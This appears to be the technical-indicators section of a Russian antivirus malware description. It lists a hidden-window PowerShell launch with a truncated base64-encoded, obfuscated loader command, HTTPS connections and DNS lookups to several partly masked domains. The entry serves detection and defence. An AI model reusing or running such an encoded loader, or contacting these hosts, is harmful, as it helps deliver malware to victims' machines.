Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABGAGwAbwBpAHYANwB0AD0AKAAoACcAVgBiACcAKwAnAGYAbQBlACcAKQArACcANQB5ACcAKQA7AC4AKAAnAG4AZQAnACsAJwB3AC0AaQB0AGUAbQAnACkAIAAkAEUATgB2ADoAdQBTAEUAcgBQAHIATwBGAGkAbABlAFwAbQBnAFUAMABMADAASQBcAG...
- 'de###silk.com':443
- 'va#########orestaurante.grupojenrab.mx':443
- 'ha####ivedonors.com':443
- 'ba###yirc.in':443
- DNS ASK de###silk.com
- DNS ASK va#########orestaurante.grupojenrab.mx
- DNS ASK ha####ivedonors.com
- DNS ASK va#####a.grupojenrab.mx
- DNS ASK ba###yirc.in
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABGAGwAbwBpAHYANwB0AD0AKAAoACcAVgBiACcAKwAnAGYAbQBlACcAKQArACcANQB5ACcAKQA7AC4AKAAnAG4AZQAnACsAJwB3AC0AaQB0AGUAbQAnACkAIAAkAEUATgB2ADoAdQBTAEUAcgBQAHIATwBGAGkAbABlAFwAbQBnAFUAMABMADAASQBcAG...' (со скрытым окном)